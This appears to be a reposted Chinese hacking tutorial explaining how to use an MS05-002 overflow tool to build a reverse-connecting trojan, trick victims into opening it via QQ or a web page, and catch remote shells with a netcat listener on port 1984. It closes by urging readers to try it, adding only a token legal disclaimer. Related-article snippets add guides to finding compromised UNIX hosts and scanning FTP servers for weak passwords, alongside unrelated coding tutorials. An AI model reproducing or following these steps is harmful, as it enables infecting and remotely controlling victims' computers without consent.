黑客如何利用Ms05002溢出找“肉鸡” (图)

溢出攻击永远是安全界中,不可忽视的角色。而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!

  实施方法:通过Ms05002攻击工具,溢出反弹IP、反弹端口,会生成含有木马性质的文件。然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问。最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机。

  步骤1.首先从网上下载Ms05002溢出工具,释放到比较理想的硬盘驱动器中,然后在CMD命令行下,输入软件名称启动该程序,会出现一些英文形式的帮助信息(如图1)。

图1

  小提示:Ms05002溢出工具,是一款需要在命令行下支持运行的程序,它可以通过溢出反弹的IP地址,生成木马服务端。这点与其他溢出程序是完全不同,而且效率相比之下,也有明显的提高,真不愧是即所有溢出程序的升级版本。  步骤2.继续在其下的命令行处,输入命令Ms05002 要生成的木马文件名 本地机器IP地址 溢出端口(如图2),然后敲击“回车键”执行。屏幕会不停的向上滚动,这时还会出现带有两句“OK”的字母提示,说明木马文件已经生成完毕了。

图 2

  步骤3.通常溢出过后,都需要监听工具来抓捕肉鸡。这里也不例外,跳转到事先准备的NC工具所在目录,然后在其命令行处输入NC –VV –L –P 1984的监听命令,并敲击“回车”键,开始监听本地1984端口的信息出入。

  小提示:NC监听软件-VV参数代表,得到更详细的输入监听内容。-L代表连接端口关闭后,仍然继续监听。-P进行监听本地端口,后跟数字就是所要监听的端口号。

  步骤4.将溢出生成的木马,以QQ形式发给网友运行,或者上传到自己的个人空间中,骗取受害者浏览运行。如果用户不幸查看所发去的木马,正在本机监听的NC等待状况,就会改为可操作命令行(如图3)。而此时的命令操作平台,也正是远方主机的SHELL平台(有关SHELL的解释,已经在前几篇文章中叙述过,这里就不做过多讲解了),现在你就可以在其主机上,为所欲为的以命令形式操控机器。

图 3

  结束语:最快捷和最灵验的“抓鸡”方法,已经摆在您面前了。还在犹豫什么?赶快前去一试此妙法吧!

  注:本文最主要的目的是介绍黑客如何攻击你电脑的,任何人不得利用本文介绍的技术作非法的事情。

(0)

相关推荐

  • 黑客如何利用Ms05002溢出找“肉鸡” (图)

    溢出攻击永远是安全界中,不可忽视的角色.而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有"惊人"的收获.至于熟练的溢出如何炼成?具体方法请见下文所示! 实施方法:通过Ms05002攻击工具,溢出反弹IP.反弹端口,会生成含有木马性质的文件.然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问.最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机. 步骤1.首先从网上下载Ms05002溢出工具,释放到比较

  • 如何寻找自己的UNIX肉鸡(图)

    今天的话题是怎么样找unix肉鸡,我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要.不罗嗦,直入正题.为什么说是我和x-laser一起找肉鸡呢?因为我们的一切操作全部是在3389肉鸡上进行的.首先我们都上到同一个终端,(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接)    这样,两个人就可以互相控制对方了,一举一动都很清楚,这种方法很好,大大提高了效率,也增加了入侵时的乐趣.建议大家推广 :) 

  • 利用Python制作动态排名图的实现代码

    大家好,今天我们要讲的是如何使用 Pyecharts 制作动态排名变化图:point_down: 制作这样的一个动态图使用到的是 Pyecharts中的TimeLine(时间线轮播图) ,代码实现起来其实稍有难度,但我希望能 通过讲解这样一张动态图的制作过程,来让各位读者可以使用Pyecharts将任何一种图动起来 ,我们开始吧! 首先我们需要思考一下这样一种 动态图的生成逻辑 ,不就是把每天的数据制作成一张条形图然后轮动吗,OK那我们的 数据要整理成啥样 呢? 一个dataframe,每列是一

  • 如何利用OpenGL画坐标轴指示图

    目录 利用OpenGL画坐标轴指示图 如何使用OpenGL绘制三维坐标系 总结 利用OpenGL画坐标轴指示图 最开始是想在左下角位置画个坐标轴 后来在网上找了一个,也是别人搬运的,没有出处.学习了一下,感觉不太方便 #include <iostream> using namespace std; #include<gl/glut.h> //这个N是用来计数的,为了验证两个回调函数display和reshape谁先执行 //结果是reshape先执行 int N = 0; GLfl

  • WebGL利用FBO完成立方体贴图效果完整实例(附demo源码下载)

    本文实例讲述了WebGL利用FBO完成立方体贴图效果的方法.分享给大家供大家参考,具体如下: 这篇主要记录WebGL的一些基本要点,顺便也学习下如何使用FBO与环境贴图.先看下效果图(需要支持WebGL,Chrome,火狐,IE11). 主要实现过程如下,先用FBO输出当前环境在立方体纹理中,再画出当前立方体,最后画球,并且把FBO关联的纹理贴在这个球面上. 开始WebGL时,最好有些OpenGL基础,在前面讲Obj完善与MD2时,大家可能已经发现了,因为着色器的添加使用,原来一些Opengl大

  • 如何利用Python matplotlib绘制雷达图

    本篇文章介绍使用matplotlib绘制雷达图. 雷达图也被称为网络图,蜘蛛图,星图,蜘蛛网图,是一个不规则的多边形.雷达图可以形象地展示相同事物的多维指标,雷达图几乎随处可见,应用场景非常多. 一.matplotlib绘制圆形雷达图 # coding=utf-8 import numpy as np import matplotlib.pyplot as plt results = [{"大学英语": 87, "高等数学": 79, "体育":

  • GoLand利用plantuml生成UML类图

    目录 步骤 1. 安装goplantuml 2. 将goplantuml集成到GoLand 3. 安装GoLand的PlantUML插件 4. 安装和集成Graphviz GoLand内置的Diagrams不像IDEA一样强大,不支持生成类图 解决方案是 利用github上的 适用于 golang 项目的 PlantUML 类图生成器:jfeliu007/goplantuml 结合Goland的PlantUML插件 步骤 1. 安装goplantuml 执行 go get github.com/

  • 利用Pytorch实现获取特征图的方法详解

    目录 简单加载官方预训练模型 图片预处理 提取单个特征图 提取多个特征图 简单加载官方预训练模型 torchvision.models预定义了很多公开的模型结构 如果pretrained参数设置为False,那么仅仅设定模型结构:如果设置为True,那么会启动一个下载流程,下载预训练参数 如果只想调用模型,不想训练,那么设置model.eval()和model.requires_grad_(False) 想查看模型参数可以使用modules和named_modules,其中named_modul

  • 利用FTP服务器的漏洞找肉鸡

    1.扫描并确定目标 俗话说的好,欲速则不达,要想在最短的时间内百发百中得到大量肉鸡.必须先确定存在FTP服务的主机,这通过扫描来完成 FTPSCAN是一款命令行下的FTP弱口令扫描指定的IP网段中快速扫描存在FTP弱口令的主机,速度和身材都是一级棒.用法也很简单! 步骤1:进入DOS命令行然后转到保存ftpscan的路径下 输入扫描命令:ftpscan.exe 218.109.2.1-218.109.2.255 200 IP段可以自己找 即以200的线程数扫描网段,218.109.2.1-218

  • 利用Python绘制MySQL数据图实现数据可视化

    本教程的所有Python代码可以在网上的IPython notebook中获取. 考虑在公司里使用Plotly?可以看一下Plotly的on-premises企业版.(注:On-premises是指软件运行在工作场所或公司内部,详见维基百科) 注意操作系统:尽管Windows或Mac用户也可以跟随本文操作,但本文假定你使用的是Ubuntu系统(Ubuntu桌面版或Ubuntu服务器版).如果你没有Ubuntu Server,你可以通过Amazon的Web服务建立一个云平台(阅读这份教程的前半部分

随机推荐